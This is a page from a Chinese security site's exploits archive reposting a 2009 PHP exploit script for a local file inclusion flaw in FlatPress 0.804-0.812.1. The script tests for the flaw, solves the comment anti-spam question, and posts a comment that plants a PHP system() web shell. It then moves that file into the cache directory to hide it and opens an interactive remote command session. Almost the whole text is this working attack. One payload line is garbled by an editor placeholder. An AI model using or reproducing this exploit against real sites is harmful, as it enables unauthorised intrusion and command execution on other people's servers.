首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution vulnera
来源:giuseppe(dot)fuggiano(at)gmail(dot)com 作者:Giuseppe 发布时间:2009-10-09  
<?php
  /* Author: Giuseppe `Zmax` Fuggiano <giuseppe(dot)fuggiano(at)gmail(dot)com>
   *
   * Description: FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
   *              vulnerability exploit (fp-includes/core/core.users.php).
   *              This code posts a crafted comment with a very simple PHP shell.
   *              It exploits the LFI, hides the shell in the cache directory
   *              and starts a remote command session via POST.
   *
   * Syntax: php fp-lfi2rce.php <host> <path> [action] [lang] [shell]
   *         <host>:   the hostname or IP address of your target;
   *         <path>:   the path where FlatPress was installed;
   *         [action]: the action to take against the host system (test, attack);
   *         [lang]:   the remote language used (en, it);";
   *         [shell]:  if already exploited, you could just have the shell name.
   *
   * Dependencies: php5-curl.
   *
   * Examples:
   *   php fp-lfi2rce.php www.example.com /       => will test
   *   php fp-lfi2rce.php www.example.com /blog attack       => will attack
   *   php fp-lfi2rce.php www.example.com /flatpress attack en 12345678.php  => start remote session
   */

  /* GET request, returns the page */
  function get_url_contents($crl, $url)
  {
    curl_setopt($crl, CURLOPT_URL, $url);
    curl_setopt($crl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($crl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($crl, CURLOPT_COOKIEJAR, 'cookie.txt');
    curl_setopt($crl, CURLOPT_COOKIEFILE, 'cookie.txt');
    $ret = curl_exec($crl);

    return $ret;
  }

  /* POST request */
  function post_url_fields($crl, $url, $fields)
  {
    curl_setopt($crl, CURLOPT_URL, $url);
    curl_setopt($crl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($crl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($crl, CURLOPT_POST, 1);
    curl_setopt($crl, CURLOPT_POSTFIELDS, $fields);
    curl_setopt($crl, CURLOPT_COOKIEJAR, 'cookie.txt');
    curl_setopt($crl, CURLOPT_COOKIEFILE, 'cookie.txt');
    $ret = curl_exec($crl);

    return $ret;
  }

  /* Execute remote command, returns the output */
  function fp_exec($crl, $sh, $cmd)
  {
    $ret = post_url_fields($crl, $sh, "c=$cmd");

    if ($ret) {
      $pos1 = strpos($ret, 'http://www.aaa') + 14;
      $pos2 = strpos($ret, 'aaa.com', $pos1);
      $result = substr($ret, $pos1, $pos2-$pos1);
      return $result;
    } else
      return false;
  }

  /* Starts a remote command session */
  function fp_shell($crl, $sh)
  {
    echo "\nStarting remote command session, type 'quit' or 'exit' to exit.\n";

    echo "\nremote> ";
    $line = trim(fgets(STDIN));

    while (($line != 'exit') && ($line != 'quit')) {
      if ($line != "") {
        if ($ret = fp_exec($crl, $sh, $line)) {
          echo "\n$ret";
        } else
          echo "\nError.\n";
      }
      echo "\nremote> ";
      $line = trim(fgets(STDIN));
    }
  }

  function fail($crl, $str)
  {
    curl_close($crl);

    die($str);
  }

  echo "\n Author: Giuseppe `Zmax` Fuggiano <giuseppe(dot)fuggiano(at)gmail(dot)com>\n";
  echo "\n";
  echo " Description: FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution\n";
  echo "              vulnerability exploit (fp-includes/core/core.users.php).\n";
  echo "              This code posts a crafted comment with a very simple PHP shell.\n";
  echo "              It exploits the LFI, hides the shell in the cache directory\n";
  echo "              and starts a remote command session via POST.\n";
  echo "\n";
  echo " Syntax: $argv[0] <host> <path> [action] [lang] [shell]\n";
  echo "         <host>:   the hostname or IP address of your target;\n";
  echo "         <path>:   the path where FlatPress was installed;\n";
  echo "         [action]: the action to take against the host system (test, attack);\n";
  echo "         [lang]:   the remote language used (en, it);\n";
  echo "         [shell]:  if already exploited, you could just have the shell name.\n";
  echo "\n";
  echo " Examples:\n";
  echo "         php $argv[0] www.example.com /
          => will test\n";
  echo "         php $argv[0] www.example.com /blog attack
          => will attack\n";
  echo "         php $argv[0] www.example.com /flatpress attack en 12345678.php  => start remote session\n\n";

  $crl = curl_init();

  if ($argc < 3 || $argv[2] == '--help' || $argv[2] == '-h')
    die();

  $HOST = $argv[1];
  $PATH = $argv[2];

  if (isset($argv[3]))
    $ACTION = $argv[3];
  else
    $ACTION = 'test';

  if (isset($argv[4]))
    $LANG = $argv[4];
  else
    $LANG = 'en';

  switch ($LANG) {
    case 'it':
      $LANGARRAY = array('aaspam'   => 'Per prevenire abusi del sistema di commenti, ' .
                                       'ti chiediamo di scrivere il risultato di ' .
                                       'questa semplice operazione matematica',
                         'sum'      => 'sommare',
                         'subtract' => 'togli');
      break;
    default: /* en */
      $LANGARRAY = array('aaspam'   => 'As a way to prevent abuses of this commenting system, ' .
                                       'we must ask you to give the result of this simple ' .
                                       'mathematical operation',
                         'sum'      => 'sum',
                         'subtract' => 'subtract');
      break;
  }

  if (isset($argv[5])) {
    $SHELL = $argv[5];
    fp_shell($crl, "fp-content/cache/$SHELL");
    curl_close($crl);
    exit();
  } else
    $SHELL = 'unknown';

  echo " Host: $HOST\n";
  echo " Path: $PATH\n";
  echo " Lang: $LANG\n";
  echo " Shell: $SHELL\n\n";

  echo " [+] Vulnerability test: ";

  $form = "user=../../admin&pass=".rand()."&submit=Login";
  $loginpage = post_url_fields($crl, "$HOST/$PATH/login.php", $form);

  if (strpos($loginpage, '<meta name="generator" content="FlatPress') == false)
    echo "vulnerable!\n\n";
  else
    fail($crl, "NOT vulnerable!\n\n");

  if ($ACTION == "test") {
    curl_close($crl);
    exit();
  }

  echo " [+] Creating the shell\n";
  echo "     * Getting the home page: ";

  $home = get_url_contents($crl, "$HOST/$PATH/");

  if (strpos($home, '<meta name="generator" content="FlatPress'))
    echo "ok\n";
  else
    fail($crl, "FAIL!\n\n");

  echo "     * Detecting an article: ";

  $entrypos = strpos($home, "x=entry:entry") + 8;

  if ($entrypos) {
    $entry = substr($home, $entrypos, 18);
    echo "$entry\n";
  } else
    fail($crl, "FAIL!\n\n");

  echo "     * Getting the comment page: ";

  $commentpage = get_url_contents($crl, "$HOST/$PATH/?x=entry:$entry;comments:1");

  if (strpos($commentpage, 'id="comment-userdata"'))
    echo "ok\n";
  else
    fail($crl, "FAIL!\n\n");

  echo "     * Solving the math operation: ";

  $mathpos = strpos($commentpage, $LANGARRAY['aaspam']) + strlen($LANGARRAY['aaspam']);
  $mathpos = strpos($commentpage, "strong", $mathpos) + strlen("strong>");
  $mathstr = substr($commentpage, $mathpos, strlen($commentpage)-$mathpos);
  $operation = strtok($mathstr, " ");

  switch ($operation) {
    case $LANGARRAY['sum']:
      $first = strtok(' ');
      $to = strtok(' ');
      $second = strtok(' ');
      $result = $first + $second;
      break;
    case $LANGARRAY['subtract']:
      $first = strtok(' ');
      $from = strtok(' ');
      $second = strtok(' ');
      $result = $second - $first;
      break;
    case (is_numeric($operation) ? $operation : ""):
      $first = $operation;
      $times = strtok(' ');
      $second = strtok(' ');
      $result = $first * $second;
      break;
    default:
      fail($crl, "FAIL!\n\n");
  }

  echo "$result\n";

  echo "     * Posting crafted comment...\n";

  $random = rand();
  $form = 'name='.$random.'&email=fake@fake.com&url=http://www.aaa\<?system(
___FCKpd___0
POST[\'c\']);?\>aaa.com' . '&aaspam='.$result.'&content=foo&submit=Add'; post_url_fields($crl, "$HOST/$PATH/?x=entry:$entry;comments:1", $form); $commentpage = get_url_contents($crl, "$HOST/$PATH/?x=entry:$entry;comments:1"); echo " * Searching comment name: "; if (preg_match_all("/comment[0-9][0-9][0-9][0-9][0-9][0-9]-[0-9][0-9][0-9][0-9][0-9][0-9]/", $commentpage, $comments, PREG_PATTERN_ORDER)) { $commententry = end($comments[0]); echo "$commententry\n"; } else fail($crl, "FAIL!\n\n"); $year = substr($entry, 5, 2); $month = substr($entry, 7, 2); $commentpath = "content/$year/$month/$entry/comments/$commententry.txt"; echo " * Hiding tracks: "; $SHELL = rand().'.php'; $form = "user=../$commentpath%00a&pass=".rand()."&submit=Login" . "&c=mv -f fp-content/$commentpath fp-content/cache/$SHELL"; $loginpage = post_url_fields($crl, "$HOST/$PATH/login.php", $form); if (strpos($loginpage, 'http://www.aaa') && strpos($loginpage, 'aaa.com')) { echo "ok\n\n"; echo " [+] Your shell: fp-content/cache/$SHELL\n"; } else fail($crl, "FAIL!\n\n"); fp_shell($crl, "$HOST/$PATH/fp-content/cache/$SHELL"); curl_close($crl); exit(); ?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·VMware Fusion <= 2.0.5 vmx86 k
·Microsoft SRV2.SYS SMB Negotia
·VMware Fusion <= 2.0.5 vmx86 k
·FlatPress versions 0.804 throu
·AOL 9.1 SuperBuddy ActiveX Con
·IBM Installation Manager versi
·BulletProof FTP Client Buffer
·Multiple EMC products remote b
·Free WMA MP3 Converter v1.1 (.
·Oracle Document Capture BlackI
·httpdx 1.4 GET Request Remote
·HP LoadRunner version 9.5 Pers
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved